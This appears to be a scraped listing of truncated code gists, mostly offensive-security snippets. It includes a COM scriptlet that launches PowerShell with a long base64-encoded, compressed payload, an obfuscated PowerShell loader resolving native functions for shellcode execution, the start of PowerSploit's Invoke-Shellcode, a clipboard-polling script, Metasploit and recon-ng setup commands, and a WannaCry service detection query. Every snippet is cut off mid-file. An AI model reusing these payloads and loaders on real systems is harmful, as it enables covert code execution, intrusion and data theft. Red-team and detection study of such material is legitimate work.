This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pyperclip | |
| import time | |
| while True: | |
| if pyperclip.paste() != 'None': | |
| print pyperclip.paste() | |
| time.sleep(2) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <QueryList> | |
| <Query Id="1"> | |
| <Select Path="Security"> | |
| *[EventData[Data[@Name='param1'] and (Data='mssecsvc')]] | |
| </Select> | |
| </Query> | |
| </QueryList> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function q3 { | |
| Param ($g7mWY, $y0ZK) | |
| $mvajw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| return $mvajw.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mvajw.GetMethod('GetModuleHandle')).Invoke($null, @($g7mWY)))), $y0ZK)) | |
| } | |
| function tma3R { | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Type[]] $v7E9, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?><scriptlet><registration progid="Notes" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script><![CDATA[ var da = new ActiveXObject("WScript.Shell").Run("powershell -ENC SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABZADUATgBUADgASgBBAEUASQBiAHYASgB2ADQASABEAGkAVABBAHcAYQAzAGwAbwBFAG0AYgBuAGkAbwB4AEgAagBSAEUARQBpAEUAaABIAHEAYgBiAHQAegBDADQANwBzAEwAdQAxAEUAbwBNAC8ANQAyAHQASABEAFMAWgB3ACsAUwBaADkAMgBQAFcAaQAyAE0AUQBmAEsAbwBYAGkARgByAEEAZgA3AEgARwAzAEwARwBWAFoANwBLADAAZwBYAC8AUABzAHAANwBDAGwALwBEAEMARABXAHMAUwB2AEoASABoAG0AbwBTAGQATABjAG0AWQBpAHYAUgBIADgAVABNAFUAMwArAEsAVQBEAHcAKwBGAFIAWABmAGoAcQBoADIAMABEAEcAegBNADcARgBCAHAAdwA3AEE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Start postgresql services | |
| > service postgresql start | |
| # Initialize the database | |
| > msfdb init | |
| # Delete and reinitialize the database | |
| > msfdb reinit | |
| # Delete database and stop using it |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Shellcode | |
| { | |
| <# | |
| .SYNOPSIS | |
| Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. | |
| PowerSploit Function: Invoke-Shellcode | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Local enumeration | |
| #------------------------------ | |
| #Bios information | |
| Get-WmiObject -Class Win32_Bios | |
| #CPU info | |
| Get-WmiObject -Class Win32_Processor | |
| #Computer model info | |
| Get-WmiObject -Class Win32_ComputerSystem |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Powershell basics: | |
| #Displays help information. | |
| Get-Help *event* | |
| Get-Help Get-EventLog | |
| Get-Help Get-EventLog -Online | |
| #Update help. | |
| Update-Help | |
| #Gets all commands that are installed on the computer, including cmdlets, aliases, functions, workflows, filters, scripts, and applications. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| workspaces create "WORKSPACE NAME" | |
| marketplace install recon/companies-contacts/pen | |
| marketplace install recon/companies-domains/pen | |
| marketplace install recon/companies-multi/shodan_org | |
| marketplace install recon/companies-multi/whois_miner | |
| marketplace install recon/companies-domains/viewdns_reverse_whois | |
| marketplace install recon/companies-multi/github_miner | |
| marketplace install recon/domains-hosts/brute_hosts | |
| marketplace install recon/domains-hosts/bing_domain_web |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import random | |
| import hashlib | |
| import base64 | |
| from pyDes import * | |
| def decrypt3DES(skey,sdata): | |
| key = binascii.unhexlify(skey) | |
| data = binascii.unhexlify(sdata) | |
| key3DES = triple_des(key, ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_NORMAL) |